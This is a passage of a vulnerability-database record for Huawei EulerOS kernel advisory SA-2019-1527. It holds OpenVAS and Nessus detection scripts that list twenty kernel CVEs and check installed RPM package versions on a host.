"VIRTUOZZO_VZLSA-2017-0294.NASL", "VIRTUOZZO_VZLSA-2017-0323.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123032", "OPENVAS:1361412562310841737", "OPENVAS:1361412562310842108", "OPENVAS:1361412562310842384", "OPENVAS:1361412562310843060", "OPENVAS:1361412562310843061", "OPENVAS:1361412562310843062", "OPENVAS:1361412562310843212", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310850626", "OPENVAS:1361412562310850746", "OPENVAS:1361412562310851515", "OPENVAS:1361412562310851516", "OPENVAS:1361412562310851548", "OPENVAS:1361412562310852048", "OPENVAS:1361412562310867852", "OPENVAS:1361412562310869476", "OPENVAS:1361412562310871452", "OPENVAS:1361412562310871761", "OPENVAS:1361412562310871762", "OPENVAS:1361412562310871765", "OPENVAS:1361412562310872418", "OPENVAS:1361412562310872419", "OPENVAS:1361412562310882664", "OPENVAS:1361412562310882665", "OPENVAS:1361412562310882668", "OPENVAS:1361412562310882674", "OPENVAS:703791"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1801", "ELSA-2013-2587", "ELSA-2013-2588", "ELSA-2013-2589", "ELSA-2014-3002", "ELSA-2014-3043", "ELSA-2017-0293", "ELSA-2017-0294", "ELSA-2017-0294-1", "ELSA-2017-0323", "ELSA-2017-0323-1", "ELSA-2017-3520", "ELSA-2017-3521", "ELSA-2017-3522", "ELSA-2018-1062", "ELSA-2019-4742"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141331", "PACKETSTORM:141339"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0025"]}, {"type": "photon", "idList": ["PHSA-2017-0005", "PHSA-2018-1.0-0122"]}, {"type": "redhat", "idList": ["RHSA-2013:1801", "RHSA-2013:1802", "RHSA-2014:0100", "RHSA-2014:0284", "RHSA-2016:0064", "RHSA-2017:0293", "RHSA-2017:0294", "RHSA-2017:0316", "RHSA-2017:0323", "RHSA-2017:0324", "RHSA-2017:0345", "RHSA-2017:0346", "RHSA-2017:0365", "RHSA-2017:0366", "RHSA-2017:0403"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-10318", "RH:CVE-2017-12192"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30431", "SECURITYVULNS:VULN:13997"]}, {"type": "seebug", "idList": ["SSV:92700"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0301-1", "OPENSUSE-SU-2017:0541-1", "OPENSUSE-SU-2017:0547-1", "SUSE-SU-2018:0040-1"]}, {"type": "symantec", "idList": ["SMNTC-1349"]}, {"type": "thn", "idList": ["THN:11E7CC33794D9968747131F3F0AE8716"]}, {"type": "threatpost", "idList": ["THREATPOST:178E0668804E2DA1322D2C1DCF6CA893"]}, {"type": "ubuntu", "idList": ["USN-2446-1", "USN-2908-5", "USN-2932-1", "USN-2947-1", "USN-2947-2", "USN-2947-3", "USN-2948-1", "USN-2948-2", "USN-2967-1", "USN-2967-2", "USN-3208-2", "USN-3209-1", "USN-3343-2", "USN-3487-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-9428", "UB:CVE-2017-18203", "UB:CVE-2017-18344"]}, {"type": "virtuozzo", "idList": ["VZA-2017-016", "VZA-2018-050", "VZA-2018-052"]}, {"type": "zdt", "idList": ["1337DAY-ID-27133", "1337DAY-ID-27134"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-8787", "epss": "0.041610000", "percentile": "0.908580000", "modified": "2023-03-15"}, {"cve": "CVE-2014-0131", "epss": "0.001390000", "percentile": "0.477240000", "modified": "2023-03-15"}, {"cve": "CVE-2016-4794", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2017-6074", "epss": "0.000430000", "percentile": "0.074530000", "modified": "2023-03-15"}, {"cve": "CVE-2014-8134", "epss": "0.001570000", "percentile": "0.503560000", "modified": "2023-03-15"}, {"cve": "CVE-2016-2069", "epss": "0.001430000", "percentile": "0.484510000", "modified": "2023-03-15"}, {"cve": "CVE-2015-5364", "epss": "0.276230000", "percentile": "0.960630000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9410", "epss": "0.002220000", "percentile": "0.586920000", "modified": "2023-03-15"}, {"cve": "CVE-2017-18203", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9940", "epss": "0.000810000", "percentile": "0.330280000", "modified": "2023-03-15"}, {"cve": "CVE-2014-1874", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2014-3181", "epss": "0.002400000", "percentile": "0.602530000", "modified": "2023-03-15"}, {"cve": "CVE-2015-8812", "epss": "0.040070000", "percentile": "0.906800000", "modified": "2023-03-15"}, {"cve": "CVE-2017-12192", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2016-0728", "epss": "0.000430000", "percentile": "0.074530000", "modified": "2023-03-15"}, {"cve": "CVE-2015-5327", "epss": "0.001200000", "percentile": "0.444440000", "modified": "2023-03-15"}, {"cve": "CVE-2016-10318", "epss": "0.001810000", "percentile": "0.535420000", "modified": "2023-03-15"}, {"cve": "CVE-2017-18344", "epss": "0.000820000", "percentile": "0.333790000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9428", "epss": "0.128970000", "percentile": "0.945680000", "modified": "2023-03-15"}, {"cve": "CVE-2013-4470", "epss": "0.001100000", "percentile": "0.423670000", "modified": "2023-03-15"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1678957314, "score": 1683999172, "epss": 1678957426}, "_internal": {"score_hash": "78f3adf0b9ed13068d3da7f807e73b6c"}, "pluginID": "1361412562311220191527", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1527\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-4470\", \"CVE-2014-0131\", \"CVE-2014-1874\", \"CVE-2014-3181\", \"CVE-2014-8134\", \"CVE-2014-9410\", \"CVE-2014-9428\", \"CVE-2014-9940\", \"CVE-2015-5327\", \"CVE-2015-5364\", \"CVE-2015-8787\", \"CVE-2015-8812\", \"CVE-2016-0728\", \"CVE-2016-10318\", \"CVE-2016-2069\", \"CVE-2016-4794\", \"CVE-2017-12192\", \"CVE-2017-18203\", \"CVE-2017-18344\", \"CVE-2017-6074\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:05:12 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1527)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1527\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1527\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1527 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.(CVE-2017-18203)\n\nThe batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.(CVE-2014-9428)\n\nThe regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.(CVE-2014-9940)\n\nThe Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.(CVE-2013-4470)\n\nA use-after-free flaw was found in the way the Linux kernel's Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system.(CVE-2017-6074)\n\nA NULL-pointer dereference vulnerability was found in the Linux kernel's TCP stack, in net/netfilter/nf_nat_redirect.c in the nf_nat_redirect_ipv4() function. A remote, unauthenticated user could exploit this flaw to create a system crash (denial of service).(CVE-2015-8787)\n\nA use-after-free flaw was found in the CXGB3 kernel driver when the network was considered to be congested. The kernel incorrectly misinterpreted the congestion as an error condition and incorrectly freed or cleaned up the socket buffer (skb). When the device then sent the skb's queued data, these structures were referenced. A local attacker could use this flaw to panic the system (denia ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "Huawei EulerOS Local Security Checks"}

{"nessus": [{"lastseen": "2021-12-23T02:30:33", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - The Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.(CVE-2017-18203i1/4%0\n\n - The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N.\n implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.(CVE-2014-9428i1/4%0\n\n - The regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.(CVE-2014-9940i1/4%0\n\n - The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.(CVE-2013-4470i1/4%0\n\n - A use-after-free flaw was found in the way the Linux kernel's Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system.(CVE-2017-6074i1/4%0\n\n - A NULL-pointer dereference vulnerability was found in the Linux kernel's TCP stack, in net/netfilter/nf_nat_redirect.c in the nf_nat_redirect_ipv4() function. A remote, unauthenticated user could exploit this flaw to create a system crash (denial of service).(CVE-2015-8787i1/4%0\n\n - A use-after-free flaw was found in the CXGB3 kernel driver when the network was considered to be congested.\n The kernel incorrectly misinterpreted the congestion as an error condition and incorrectly freed or cleaned up the socket buffer (skb). When the device then sent the skb's queued data, these structures were referenced. A local attacker could use this flaw to panic the system (denial of service) or, with a local account, escalate their privileges.(CVE-2015-8812i1/4%0\n\n - A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.(CVE-2015-5364i1/4%0\n\n - The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent-i1/4zsigev_notify field, which leads to out-of-bounds access in the show_timer function.(CVE-2017-18344i1/4%0\n\n - A flaw was discovered in the way the Linux kernel dealt with paging structures. When the kernel invalidated a paging structure that was not in use locally, it could, in principle, race against another CPU that is switching to a process that uses the paging structure in question. A local user could use a thread running with a stale cached virtual-i1/4zphysical translation to potentially escalate their privileges if the translation in question were writable and the physical page got reused for something critical (for example, a page table).(CVE-2016-2069i1/4%0\n\n - Use after free vulnerability was found in percpu using previously allocated memory in bpf. First\n __alloc_percpu_gfp() is called, then the memory is freed with free_percpu() which triggers async pcpu_balance_work and then pcpu_extend_area_map could use a chunk after it has been freed.(CVE-2016-4794i1/4%0\n\n - A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.(CVE-2016-10318i1/4%0\n\n - The security_context_to_sid_core function in security/selinux/ss/services.c in the Linux kernel before 3.13.4 allows local users to cause a denial of service (system crash) by leveraging the CAP_MAC_ADMIN capability to set a zero-length security context.(CVE-2014-1874i1/4%0\n\n - The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c in the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate a certain id value, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.(CVE-2014-9410i1/4%0\n\n - A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on a negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.(CVE-2017-12192i1/4%0\n\n - Out-of-bounds memory read in the x509_decode_time function in x509_cert_parser.c in Linux kernels 4.3-rc1 and after.(CVE-2015-5327i1/4%0\n\n - It was found that the espfix functionality does not work for 32-bit KVM paravirtualized guests. A local, unprivileged guest user could potentially use this flaw to leak kernel stack addresses.(CVE-2014-8134i1/4%0\n\n - An out-of-bounds write flaw was found in the way the Apple Magic Mouse/Trackpad multi-touch driver handled Human Interface Device (HID) reports with an invalid size. An attacker with physical access to the system could use this flaw to crash the system or, potentially, escalate their privileges on the system.(CVE-2014-3181i1/4%0\n\n - A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system.(CVE-2016-0728i1/4%0\n\n - Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.(CVE-2014-0131i1/4%0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1527)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4470", "CVE-2014-0131", "CVE-2014-1874", "CVE-2014-3181", "CVE-2014-8134", "CVE-2014-9410", "CVE-2014-9428", "CVE-2014-9940", "CVE-2015-5327", "CVE-2015-5364", "CVE-2015-8787", "CVE-2015-8812", "CVE-2016-0728", "CVE-2016-10318", "CVE-2016-2069", "CVE-2016-4794", "CVE-2017-12192", "CVE-2017-18203", "CVE-2017-18344", "CVE-2017-6074"], "modified": "2021-02-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1527.NASL", "href": "https://www.tenable.com/plugins/nessus/124980", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124980);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2013-4470\",\n \"CVE-2014-0131\",\n \"CVE-2014-1874\",\n \"CVE-2014-3181\",\n \"CVE-2014-8134\",\n \"CVE-2014-9410\",\n \"CVE-2014-9428\",\n \"CVE-2014-9940\",\n \"CVE-2015-5327\",\n \"CVE-2015-5364\",\n \"CVE-2015-8787\",\n \"CVE-2015-8812\",\n \"CVE-2016-0728\",\n \"CVE-2016-10318\",\n \"CVE-2016-2069\",\n \"CVE-2016-4794\",\n \"CVE-2017-12192\",\n \"CVE-2017-18203\",\n \"CVE-2017-18344\",\n \"CVE-2017-6074\"\n );\n script_bugtraq_id(\n 63359,\n 65459,\n 66101,\n 69779,\n 71650,\n 71847,\n 75510\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1527)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.(CVE-2017-18203i1/4%0\n\n - The batadv_frag_merge_packets function in\n net/batman-adv/fragmentation.c in the B.A.T.M.A.N.\n implementation in the Linux kernel through 3.18.1 uses\n an incorrect length field during a calculation of an\n amount of memory, which allows remote attackers to\n cause a denial of service (mesh-node system crash) via\n fragmented packets.(CVE-2014-9428i1/4%0\n\n - The regulator_ena_gpio_free function in\n drivers/regulator/core.c in the Linux kernel allows\n local users to gain privileges or cause a denial of\n service (use-after-free) via a crafted\n application.(CVE-2014-9940i1/4%0\n\n - The Linux kernel before 3.12, when UDP Fragmentation\n Offload (UFO) is enabled, does not properly initialize\n certain data structures, which allows local users to\n cause a denial of service (memory corruption and system\n crash) or possibly gain privileges via a crafted\n application that uses the UDP_CORK option in a\n setsockopt system call and sends both short and long\n packets, related to the ip_ufo_append_data function in\n net/ipv4/ip_output.c and the ip6_ufo_append_data\n function in net/ipv6/ip6_output.c.(CVE-2013-4470i1/4%0\n\n - A use-after-free flaw was found in the way the Linux\n kernel's Datagram Congestion Control Protocol (DCCP)\n implementation freed SKB (socket buffer) resources for\n a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO\n option is set on the socket. A local, unprivileged user\n could use this flaw to alter the kernel memory,\n allowing them to escalate their privileges on the\n system.(CVE-2017-6074i1/4%0\n\n - A NULL-pointer dereference vulnerability was found in\n the Linux kernel's TCP stack, in\n net/netfilter/nf_nat_redirect.c in the\n nf_nat_redirect_ipv4() function. A remote,\n unauthenticated user could exploit this flaw to create\n a system crash (denial of service).(CVE-2015-8787i1/4%0\n\n - A use-after-free flaw was found in the CXGB3 kernel\n driver when the network was considered to be congested.\n The kernel incorrectly misinterpreted the congestion as\n an error condition and incorrectly freed or cleaned up\n the socket buffer (skb). When the device then sent the\n skb's queued data, these structures were referenced. A\n local attacker could use this flaw to panic the system\n (denial of service) or, with a local account, escalate\n their privileges.(CVE-2015-8812i1/4%0\n\n - A flaw was found in the way the Linux kernel's\n networking implementation handled UDP packets with\n incorrect checksum values. A remote attacker could\n potentially use this flaw to trigger an infinite loop\n in the kernel, resulting in a denial of service on the\n system, or cause a denial of service in applications\n using the edge triggered epoll\n functionality.(CVE-2015-5364i1/4%0\n\n - The timer_create syscall implementation in\n kernel/time/posix-timers.c in the Linux kernel doesn't\n properly validate the sigevent-i1/4zsigev_notify field,\n which leads to out-of-bounds access in the show_timer\n function.(CVE-2017-18344i1/4%0\n\n - A flaw was discovered in the way the Linux kernel dealt\n with paging structures. When the kernel invalidated a\n paging structure that was not in use locally, it could,\n in principle, race against another CPU that is\n switching to a process that uses the paging structure\n in question. A local user could use a thread running\n with a stale cached virtual-i1/4zphysical translation to\n potentially escalate their privileges if the\n translation in question were writable and the physical\n page got reused for something critical (for example, a\n page table).(CVE-2016-2069i1/4%0\n\n - Use after free vulnerability was found in percpu using\n previously allocated memory in bpf. First\n __alloc_percpu_gfp() is called, then the memory is\n freed with free_percpu() which triggers async\n pcpu_balance_work and then pcpu_extend_area_map could\n use a chunk after it has been freed.(CVE-2016-4794i1/4%0\n\n - A missing authorization check in the\n fscrypt_process_policy function in fs/crypto/policy.c\n in the ext4 and f2fs filesystem encryption support in\n the Linux kernel allows a user to assign an encryption\n policy to a directory owned by a different user,\n potentially creating a denial of\n service.(CVE-2016-10318i1/4%0\n\n - The security_context_to_sid_core function in\n security/selinux/ss/services.c in the Linux kernel\n before 3.13.4 allows local users to cause a denial of\n service (system crash) by leveraging the CAP_MAC_ADMIN\n capability to set a zero-length security\n context.(CVE-2014-1874i1/4%0\n\n - The vfe31_proc_general function in\n drivers/media/video/msm/vfe/msm_vfe31.c in the\n MSM-VFE31 driver for the Linux kernel 3.x, as used in\n Qualcomm Innovation Center (QuIC) Android contributions\n for MSM devices and other products, does not validate a\n certain id value, which allows attackers to gain\n privileges or cause a denial of service (memory\n corruption) via an application that makes a crafted\n ioctl call.(CVE-2014-9410i1/4%0\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on a negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192i1/4%0\n\n - Out-of-bounds memory read in the x509_decode_time\n function in x509_cert_parser.c in Linux kernels 4.3-rc1\n and after.(CVE-2015-5327i1/4%0\n\n - It was found that the espfix functionality does not\n work for 32-bit KVM paravirtualized guests. A local,\n unprivileged guest user could potentially use this flaw\n to leak kernel stack addresses.(CVE-2014-8134i1/4%0\n\n - An out-of-bounds write flaw was found in the way the\n Apple Magic Mouse/Trackpad multi-touch driver handled\n Human Interface Device (HID) reports with an invalid\n size. An attacker with physical access to the system\n could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2014-3181i1/4%0\n\n - A use-after-free flaw was found in the way the Linux\n kernel's key management subsystem handled keyring\n object reference counting in certain error path of the\n join_session_keyring() function. A local, unprivileged\n user could use this flaw to escalate their privileges\n on the system.(CVE-2016-0728i1/4%0\n\n - Use-after-free vulnerability in the skb_segment\n function in net/core/skbuff.c in the Linux kernel\n through 3.13.6 allows attackers to obtain sensitive\n information from kernel memory by leveraging the\n absence of a certain orphaning\n operation.(CVE-2014-0131i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1527\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfd6ac3d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, 